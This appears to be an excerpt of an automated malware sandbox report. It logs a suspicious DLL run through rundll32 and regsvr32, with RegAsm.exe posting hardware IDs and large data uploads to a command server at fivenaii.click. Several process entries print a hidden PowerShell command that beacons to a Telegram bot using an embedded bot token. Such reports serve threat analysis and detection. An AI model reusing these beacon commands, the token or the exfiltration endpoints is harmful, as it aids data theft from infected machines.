                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=t9bi34k8dhgps05p5qqslam35a; expires=Tue, 22 Apr 2025 15:20:14 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2BhND65gN4n2WN1YFqo5evpV4Wd7nMOWinivLqiK%2BmAxrebkCxb%2BgT%2BfGneka0Go3hhPHLfmz8Fi1YE7jO%2BT6ATosbHJwHGnhq33HxjoFozKPxA%2BQWX2zRlbc0fTeSPKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e08a9498c3f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2086&rtt_var=782&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9726&delivery_rate=1399137&cwnd=229&unsent_bytes=0&cid=b3397040c95f4981&ts=822&x=0"
                                                                                              2024-12-27 21:33:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              23 | 192.168.2.4 | 49771 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:35 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=9KREDXIF8S0UJ1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571116
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 39 4b 52
                                                                                              Data Ascii: --9KREDXIF8S0UJ1Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--9KREDXIF8S0UJ1Content-Disposition: form-data; name="pid"1--9KREDXIF8S0UJ1Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--9KR
                                                                                              2024-12-27 21:33:37 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=v0rkunicbur5elr66gon5dnvuq; expires=Tue, 22 Apr 2025 15:20:16 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XkrHLas%2F2S7%2Fs36Q1wxxajrq6VSzDYvndfAJ0ZlRdqx1m5%2BMQH9zLfG82sCOIeHw%2FBMjzJP%2F4GStrhYAzhIcLHiuxnh3ifNpdKF8wsDUVQt8bkf2XfLm1i%2B5JMo6WiJoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e094a220f83-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1634&rtt_var=633&sent=312&recv=597&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573657&delivery_rate=1701631&cwnd=230&unsent_bytes=0&cid=204502405117c160&ts=2442&x=0"


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              24 | 192.168.2.4 | 49772 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:37 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K0RL857YU4
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20394
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:37 UTC | 15331 | OUT | Data Ascii: --K0RL857YU4Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--K0RL857YU4Content-Disposition: form-data; name="pid"3--K0RL857YU4Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--K0RL857YU4Con
                                                                                              2024-12-27 21:33:38 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=pi3vvi3am1aps57klbe35f96jo; expires=Tue, 22 Apr 2025 15:20:16 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqxg9GRpvAjvhEnNydaca1MAf21Gw29WRQP719RuXkQ3q0NFZjfIjBTEmwNWTnrHtzK50mI7Qi6hQ%2BjxWYg6Ylv5uKeoKKIpElfP5wcDBS6KPf0RtnbyOGTpGPaEXRbo8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e159bb14325-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1764&rtt_var=672&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21346&delivery_rate=1615938&cwnd=180&unsent_bytes=0&cid=d97a3fc96d1b392a&ts=804&x=0"
                                                                                              2024-12-27 21:33:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              25 | 192.168.2.4 | 49773 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:39 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:39 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:39 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:39 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=sfeahf40fkmglrujcm4hjvvesl; expires=Tue, 22 Apr 2025 15:20:18 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvZHaDepz08LhjcGaaG9eMsgOL644BEJf0f7Rgz7EwssjmtIPQJzYFH%2FKRT8JAxg7KslMSxxYYgH9JRDT6bmtkyB4WKzkNLbh7Ckxnk5jvfyqcCOXyI2TkYbzp6vwkrWsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e20a8317cb4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1962&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1416100&cwnd=230&unsent_bytes=0&cid=24fdd479dd7773d7&ts=809&x=0"
                                                                                              2024-12-27 21:33:39 UTC | 54 | IN | Data Raw: 33 30 0d 0a 58 52 4a 51 49 38 2b 36 79 6e 67 54 44 54 2f 65 4b 79 4f 30 7a 61 78 48 47 79 50 59 32 76 78 6c 7a 4a 61 4d 4b 32 49 6c 45 33 30 47 54 77 3d 3d 0d 0a
                                                                                              Data Ascii: 30XRJQI8+6yngTDT/eKyO0zaxHGyPY2vxlzJaMK2IlE30GTw==
                                                                                              2024-12-27 21:33:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              26 | 192.168.2.4 | 49774 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:39 UTC | 269 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LO675W50
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1189
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:39 UTC | 1189 | OUT | Data Ascii: --LO675W50Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--LO675W50Content-Disposition: form-data; name="pid"1--LO675W50Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--LO675W50Content-Dis
                                                                                              2024-12-27 21:33:40 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=k8mojuhl4jkv6os13f735fs7o9; expires=Tue, 22 Apr 2025 15:20:19 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH5JTm9Vz878As0%2FR%2Bglb6ATx4NyCpw%2FQJiNSlz6AwERPcS99tpHmNYR3ic89keKDY91l05S%2B3VwM6jCmG803o4GZZdlMkRblllOEtWZlzPFtThqmXdXZn80Fp7L9Ec93Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e23386e4346-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1750&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2094&delivery_rate=1620421&cwnd=252&unsent_bytes=0&cid=89b63937d62c8260&ts=800&x=0"
                                                                                              2024-12-27 21:33:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              27 | 192.168.2.4 | 49775 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:41 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=E8126BCFD
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571086
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:41 UTC | 15331 | OUT | Data Ascii: --E8126BCFDContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--E8126BCFDContent-Disposition: form-data; name="pid"1--E8126BCFDContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--E8126BCFDContent
                                                                                              Data Ascii: }E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[v.
                                                                                              2024-12-27 21:33:44 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=shbudppio9k946k6f2nio64c5s; expires=Tue, 22 Apr 2025 15:20:22 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFvfYeHuGCMzqFOg3%2FgQjZTYJ6Dfb7rE9oeCPbngl%2BjsBkjbSAH9VqFnpy2Jg%2FIKWifwXKEcFUKhd1lwYgxVjdy4zUeAJggSLEqUvR6Fxls5yfYygN%2FowmeXDVp96K4lkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e31cffe7d26-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2004&rtt_var=764&sent=297&recv=592&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573622&delivery_rate=1421616&cwnd=205&unsent_bytes=0&cid=698a9a854e16061f&ts=2274&x=0"


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              28 | 192.168.2.4 | 49776 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:45 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:45 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:46 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1d5cb7c180ul4u5ojogesr2ssv; expires=Tue, 22 Apr 2025 15:20:24 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdS6kTUsh%2Bqp2o2GxCrl1rDo4WhiGqG6jURrzk6lhaihQSl%2FHz6ldLoka6jSkzOwqkcq4b8PVsyuLjkeHlpcnkK8EqBrWyeSEu5tWwfrVMDKpglXkDyNT7sT5%2By35B5L%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e488e8c4399-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1884&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1541710&cwnd=222&unsent_bytes=0&cid=8424327633a3c83b&ts=790&x=0"
                                                                                              2024-12-27 21:33:46 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6f 2f 6a 30 78 31 73 37 5a 6f 38 37 61 65 6a 63 55 77 77 65 61 75 4c 37 31 32 32 33 4d 56 65 51 4f 71 76 43 78 59 6c 71 48 4e 6a 34 70 51 3d 3d 0d 0a
                                                                                              Data Ascii: 30o/j0x1s7Zo87aejcUwweauL71223MVeQOqvCxYlqHNj4pQ==
                                                                                              2024-12-27 21:33:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0



                                                                                              Target ID:0
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
                                                                                              Imagebase:0xab0000
                                                                                              File size:126'464 bytes
                                                                                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
                                                                                              Imagebase:0xb0000
                                                                                              File size:20'992 bytes
                                                                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
                                                                                              Imagebase:0xe20000
                                                                                              File size:61'440 bytes
                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                                                              Imagebase:0xe20000
                                                                                              File size:61'440 bytes
                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

